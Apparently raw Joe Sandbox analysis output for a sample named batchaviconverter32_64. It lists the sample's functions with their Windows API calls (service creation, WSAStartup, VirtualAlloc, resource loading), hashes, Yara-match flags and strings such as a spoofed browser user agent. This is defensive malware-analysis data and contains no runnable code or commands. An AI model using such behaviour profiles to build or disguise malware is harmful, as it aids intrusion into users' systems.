                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeaveSleep_free
                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                              • API String ID: 1317429769-1923541051
                                                              • Opcode ID: 75549abe72c9e0a5a579ca6c86203ca24752609a14dfd15c62e2bba4a0929338
                                                              • Instruction ID: 5fbf05a86f4bbd25860b3826cc2f5fb313720dd416d4f50da790d3619a57e284
                                                              • Opcode Fuzzy Hash: 75549abe72c9e0a5a579ca6c86203ca24752609a14dfd15c62e2bba4a0929338
                                                              • Instruction Fuzzy Hash: 3431E43694C3809BE310EB70AC45A9EBBA6EF4A720F244859E582AB340D721DC01DAD6

                                                              APIs
                                                              • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                              • GetLastError.KERNEL32 ref: 00401F86
                                                              • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                              • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                              • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                              • GetTickCount.KERNEL32 ref: 00401FFB
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                              • String ID:
                                                              • API String ID: 564119183-0
                                                              • Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                              • Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
                                                              • Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                              • Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8

                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 00402D86
                                                                • Part of subcall function 004039F0: HeapCreate.KERNEL32(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                              • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                              • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                              • String ID: 5s
                                                              • API String ID: 2057626494-2399958700
                                                              • Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                              • Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
                                                              • Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                              • Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59

                                                              APIs
                                                              • RegCloseKey.KERNEL32(?), ref: 00402675
                                                              • RegQueryValueExA.KERNEL32(?), ref: 0040B42C
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 3356406503-992513482
                                                              • Opcode ID: 9f3ab80b34013c7ae2a3ba5b718e8f9b7d011b98ac830053569414634423122b
                                                              • Instruction ID: ea9df7bfd44bb0946ed55302e346c09ade04677403cacf3b491b9d5a1f41658c
                                                              • Opcode Fuzzy Hash: 9f3ab80b34013c7ae2a3ba5b718e8f9b7d011b98ac830053569414634423122b
                                                              • Instruction Fuzzy Hash: 78E01230949015E7D6012B604F0DD7F2A64EE84304B2589BBE613750D1D77D551376DF

                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(02DB727C), ref: 02D81ABA
                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 02D81ACB
                                                              • InterlockedExchange.KERNEL32(02DB7280,00000000), ref: 02D81AD7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                              • String ID:
                                                              • API String ID: 1856147945-0
                                                              • Opcode ID: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                              • Instruction ID: dbaa2c6c46acb6b5f89366b3ea95fbdfc96a1b4b6f85adf9a5c7b80794bc20b4
                                                              • Opcode Fuzzy Hash: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                              • Instruction Fuzzy Hash: F0D05E32E842049BF22176E0BD0FEBCF76CEB05611F100651FC6AC03C0EB519D2885AA

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 3535843008-992513482
                                                              • Opcode ID: 71178b521464b22cec81154ab39d6b61894fd2ef990d7a80b8901f9365d8adb4
                                                              • Instruction ID: 140215818bd542184c6db6de9533f9e15bd1c8d3566ca8fcfb9ac77aee970921
                                                              • Opcode Fuzzy Hash: 71178b521464b22cec81154ab39d6b61894fd2ef990d7a80b8901f9365d8adb4
                                                              • Instruction Fuzzy Hash: F4D02E2081E402A2E02023205F5ECAF1ECCCC6A308B2186BBFF02710C183BC401351EF

                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040B5D6
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040229B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 71445658-2036018995
                                                              • Opcode ID: 14becb601f24dd6e911325f749a7f7000fa81a16bc6822c01ec34a94a7934bab
                                                              • Instruction ID: da86c39f3427503fa6fa6f990265045fabc2e28eb1ecfff1a0a46ed3c673e4a6
                                                              • Opcode Fuzzy Hash: 14becb601f24dd6e911325f749a7f7000fa81a16bc6822c01ec34a94a7934bab
                                                              • Instruction Fuzzy Hash: B2D05B2018C655DAD3114F518E593A57B50EF11B0C73085EE9893B71D2C7B54466D35F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID: .exe
                                                              • API String ID: 1304948518-4119554291
                                                              • Opcode ID: c9b541b096ac0a48a00383a63f0ec283f01a2ba28950dda0ec536793447ef056
                                                              • Instruction ID: 979c920877eab106eb47a83716a27eaf5ee87f07d3e7c28683a3c093931a9752
                                                              • Opcode Fuzzy Hash: c9b541b096ac0a48a00383a63f0ec283f01a2ba28950dda0ec536793447ef056
                                                              • Instruction Fuzzy Hash: F7D0C975949115E7E10066655F4EE9A666C8A08748B2084B7BA06B10C1D6BC5206A5FF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: [8f5
                                                              • API String ID: 3472027048-1915022229
                                                              • Opcode ID: 4077903a7ddeb9f38e2dc7d4c6c6d4cbd64e2366f24940343d4e4aa997f81959
                                                              • Instruction ID: d905575ec0926795751f2d95ab1bb5c65efac879a45a5eb1ac6c5f2253a70e5f
                                                              • Opcode Fuzzy Hash: 4077903a7ddeb9f38e2dc7d4c6c6d4cbd64e2366f24940343d4e4aa997f81959
                                                              • Instruction Fuzzy Hash: E6414BB254C704AFD305BF19EC95ABAFBE8EB44710F02492DEAC543740EA356840CB9B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c15c9526de40452988b7871925f212181b2a0656ce9b97c9c85048b8dbc2fb6
                                                              • Instruction ID: cb2e9ac313128095a71e44c717dfbe73d0fc4547dac7c95aa83db207b15f171e
                                                              • Opcode Fuzzy Hash: 6c15c9526de40452988b7871925f212181b2a0656ce9b97c9c85048b8dbc2fb6
                                                              • Instruction Fuzzy Hash: 2901102204C682DBC3229B708A2D1E63F68EF0031072041FB8182EB2D3C7BC200393DD
                                                              APIs
                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                              • HeapDestroy.KERNEL32 ref: 00403A40
                                                                • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                              • String ID:
                                                              • API String ID: 2507506473-0
                                                              • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                              • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                              • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                              • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseValue
                                                              • String ID:
                                                              • API String ID: 3132538880-0
                                                              • Opcode ID: 8dd3f2575dd90e2cb18feb9ee4b943cc514a0b17e9529a5695a78f9b8cbfa6c0
                                                              • Instruction ID: b02079ab183da12d8d24e84b513181e84d706f9db74907cb040d883337907184
                                                              • Opcode Fuzzy Hash: 8dd3f2575dd90e2cb18feb9ee4b943cc514a0b17e9529a5695a78f9b8cbfa6c0
                                                              • Instruction Fuzzy Hash: E6B09231958000EBCB055BE0EE085283F71FB08301B124031E207704B2C7352962AF9F
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 5f3154d1a41598e8993a2276050e7f9040ebf786f0a5adafcea011883b321f86
                                                              • Instruction ID: cab705d737d828d3e0ae5d8e6426ddb64e255dcbffe3a8b254c5fec929988430
                                                              • Opcode Fuzzy Hash: 5f3154d1a41598e8993a2276050e7f9040ebf786f0a5adafcea011883b321f86
                                                              • Instruction Fuzzy Hash: FC019BB36082209FD3246A6DE89ABBEBB94EF40774F06053DE7C546744E5701440C6D6
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(?), ref: 00402286
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 25c27a79d5e8c5d4907328dd030ad379705e51eba7445cda96f7cf4e48879fa5
                                                              • Instruction ID: 8679871482aaffd31fcc0a8903d333394e124a61a7c03b662124064b65c278b1
                                                              • Opcode Fuzzy Hash: 25c27a79d5e8c5d4907328dd030ad379705e51eba7445cda96f7cf4e48879fa5
                                                              • Instruction Fuzzy Hash: BBF08C71201216CBEB14CF14C9C466137A4FF05750B24047AEC01EB2C4E378D8159B9E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 2b89a879b32ab2df01939177e93c88ab5c1f8bd73f17d56ca26e8c0698ac018b
                                                              • Instruction ID: 6133aa3c473c590e42fea8577e79632c399acb6f34aeac207ba4191e6f090f26
                                                              • Opcode Fuzzy Hash: 2b89a879b32ab2df01939177e93c88ab5c1f8bd73f17d56ca26e8c0698ac018b
                                                              • Instruction Fuzzy Hash: 21C02B33C0C300CFC3410720542426837F02400151B370483E0B377381D220EC08C3CD
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID:
                                                              • API String ID: 4241100979-0
                                                              • Opcode ID: f26b9ed8aa9ce9717b0f3a2329cfd49bd6067e7a935878d9416f2b08596b86bf
                                                              • Instruction ID: c060ff00f01b497ab3d7f79e6a554ece389e235889c97c25d1c293a4ca7d7c2f
                                                              • Opcode Fuzzy Hash: f26b9ed8aa9ce9717b0f3a2329cfd49bd6067e7a935878d9416f2b08596b86bf
                                                              • Instruction Fuzzy Hash: 2AA011280EA030F3C00223A00E0ACAAA828A80A3023300233B303B08C002FC0002A3BF
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: ManagerOpen
                                                              • String ID:
                                                              • API String ID: 1889721586-0
                                                              • Opcode ID: fb50a67e83c14e0e169a45160d1509e417380c4981eb8e0e7061b8ae233626b2
                                                              • Instruction ID: b5ff5ccd1d8ad79b52359c6b0501e9828669fcbd3c28c983163a8553bf7430bf
                                                              • Opcode Fuzzy Hash: fb50a67e83c14e0e169a45160d1509e417380c4981eb8e0e7061b8ae233626b2
                                                              • Instruction Fuzzy Hash: 1CA001A0159406AED2916B605EED83A259E994034A3610836A203A40E0867A4C56AD7F
                                                              APIs
                                                              • CreateFileA.KERNEL32(000000E6), ref: 02DBF4BC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5c1339336bce6bd91ad901ad46bd6a9b8ba40ef150e652d889b85a1b8ceaf025
                                                              • Instruction ID: 5e4b20724296884362096620009c623506009cff1127a309192cad944248993f
                                                              • Opcode Fuzzy Hash: 5c1339336bce6bd91ad901ad46bd6a9b8ba40ef150e652d889b85a1b8ceaf025
                                                              • Instruction Fuzzy Hash: EFB0123384C204CF92445640CC0ED543770B905211B140220A013423E0F6505C008542
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: fc29cdd59cc1f60a843e892c59c3bce5da0c7b4d797c76b2cd3eef584fbfea33
                                                              • Instruction ID: 4d469e8581fb7edb61682280f78a10ab54891c46452e293fdf97ed303fbf583c
                                                              • Opcode Fuzzy Hash: fc29cdd59cc1f60a843e892c59c3bce5da0c7b4d797c76b2cd3eef584fbfea33
                                                              • Instruction Fuzzy Hash: 62900430344101DFF3104F715F4C31535DC55047457110475D707F10D0D774C015551D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 9f18025afd88916d2665759027bb32028c9d7f02ff3c476a0b37f8ea8da89afe
                                                              • Instruction ID: 7703e7cb1e724ca5c7701d1e7990fd407afd39307150818d6388e50d32ac880f
                                                              • Opcode Fuzzy Hash: 9f18025afd88916d2665759027bb32028c9d7f02ff3c476a0b37f8ea8da89afe
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0040B7B5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0e99515d809016a191a9d1f9480ae38e20174d825c6b328399fa96da3bd4fe5f
                                                              • Instruction ID: 0f736fba878ff0e935acd360bd96245de1721678441149802ece6dcd8f1625c1
                                                              • Opcode Fuzzy Hash: 0e99515d809016a191a9d1f9480ae38e20174d825c6b328399fa96da3bd4fe5f
                                                              • Instruction Fuzzy Hash: 2DD09737104212BBE3080E508DA5B543B67FB94BC0F22003AEB03376C0A7B69851D7CB
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 2af1d514474a7dea83df63868d0e81c3db74e4bd0b8ef448e5b03a3c5012fe89
                                                              • Instruction ID: 87374c4478fdb236f8d826cf14729e88be7d10b16993dd576865df85b41b0098
                                                              • Opcode Fuzzy Hash: 2af1d514474a7dea83df63868d0e81c3db74e4bd0b8ef448e5b03a3c5012fe89
                                                              • Instruction Fuzzy Hash: 56A01120A88302A2E2000BA02C0AB282020BB00B00F20002B2303388C082BC00033A8F
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 1fe82211f58c4d4f1099d4034584c1cfa4f19cce5f0d0485685b27bddf880e93
                                                              • Instruction ID: 5c98b9bc7163b92cf8844e93d7975e39b2843cb567a211c80d699d2720ce2c87
                                                              • Opcode Fuzzy Hash: 1fe82211f58c4d4f1099d4034584c1cfa4f19cce5f0d0485685b27bddf880e93
                                                              • Instruction Fuzzy Hash: DEA00271445901EBC7454B60AA0C968BB31F7043053560269E54364460C73A5536EB8D
                                                              APIs
                                                              • CreateServiceA.ADVAPI32 ref: 0040273F
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B24E
                                                              • CloseServiceHandle.ADVAPI32(?), ref: 0040B8E4
                                                              • CloseServiceHandle.ADVAPI32(?), ref: 0040BAA2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Create
                                                              • String ID:
                                                              • API String ID: 2095555506-0
                                                              • Opcode ID: 3772de51581073650ac9654a5d400be238f07d097025b7825f37d2b6d7cfea42
                                                              • Instruction ID: 90891978d3190901301319106e4646f9dc10c153fd31ea45c640ea8e25af6178
                                                              • Opcode Fuzzy Hash: 3772de51581073650ac9654a5d400be238f07d097025b7825f37d2b6d7cfea42
                                                              • Instruction Fuzzy Hash: F7E08C30A88014D6DA24AB504D4C8AD3A34E700304B354076D00B7A0D0C73EAE52FEAE
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908D2
                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908DA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                              • Instruction ID: 03b7b4f479114b0cbf68670eaa32ef6cb9e2890e1afe14117dc54fe0007d4db8
                                                              • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                              • Instruction Fuzzy Hash: 68F09A30308301DFEB24CA25C851B2EBBE4AB9C745F54092CF69692291E370E581CF5A
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D94DC6,?,?,?,00000001), ref: 02D9945D
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D99466
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: e0eacae0242e1e5faf590052052bcae401a8f098aee6db5c0530e5f02416657f
                                                              • Instruction ID: 985ca834110de4d28dac166a223b26c0e480c538823d3516225f17fd21feffa8
                                                              • Opcode Fuzzy Hash: e0eacae0242e1e5faf590052052bcae401a8f098aee6db5c0530e5f02416657f
                                                              • Instruction Fuzzy Hash: 9FB092324C4208EBEB012B91EC0AF8DBF38EB04662F104810F60D44290CB6258219AA9
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStart
                                                              • String ID:
                                                              • API String ID: 3789849863-0
                                                              • Opcode ID: 9fce92389dee86bdaadd48ad1fa97b9ef5a8344f47219d14ed2d554c962dbdbe
                                                              • Instruction ID: 5628e6816dd4cdc2200e07d29d33549c9cbd26bb2940077c2d0ad821dd692931
                                                              • Opcode Fuzzy Hash: 9fce92389dee86bdaadd48ad1fa97b9ef5a8344f47219d14ed2d554c962dbdbe
                                                              • Instruction Fuzzy Hash: 82D01270C0C645DFEB10CB5085989793B78E705385F24C0B7981B7A0C1C73C8516EA4E
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStart
                                                              • String ID:
                                                              • API String ID: 3789849863-0
                                                              • Opcode ID: 7e16860faa1408c7c55987ee4ca1ba6a2a54c48f9f8a63b0668f5852601dbab4
                                                              • Instruction ID: 1208425d594af506da73105ee3485c40963d8588f0119b6f43d7770bf72bb54f
